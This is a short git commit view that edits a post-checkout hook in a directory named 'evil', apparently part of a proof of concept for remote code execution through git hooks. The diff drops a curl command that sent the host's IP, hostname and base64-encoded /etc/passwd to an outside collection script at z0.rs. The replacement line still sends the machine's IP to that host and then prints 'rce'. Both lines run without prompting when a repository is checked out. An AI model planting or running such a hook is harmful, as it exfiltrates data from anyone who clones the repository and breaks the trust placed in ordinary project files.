Update modules/1/2/3/4/evil/hooks/post-checkout

This commit is contained in:
z0rs 2024-01-11 22:48:50 -06:00
parent 4955acfca9
commit c4a5648eff
1 changed files with 2 additions and 2 deletions

View File

@ -1,3 +1,3 @@
#!/bin/bash
curl -X POST http://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"
echo 'rce'
curl -X POST http://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')";
echo 'rce';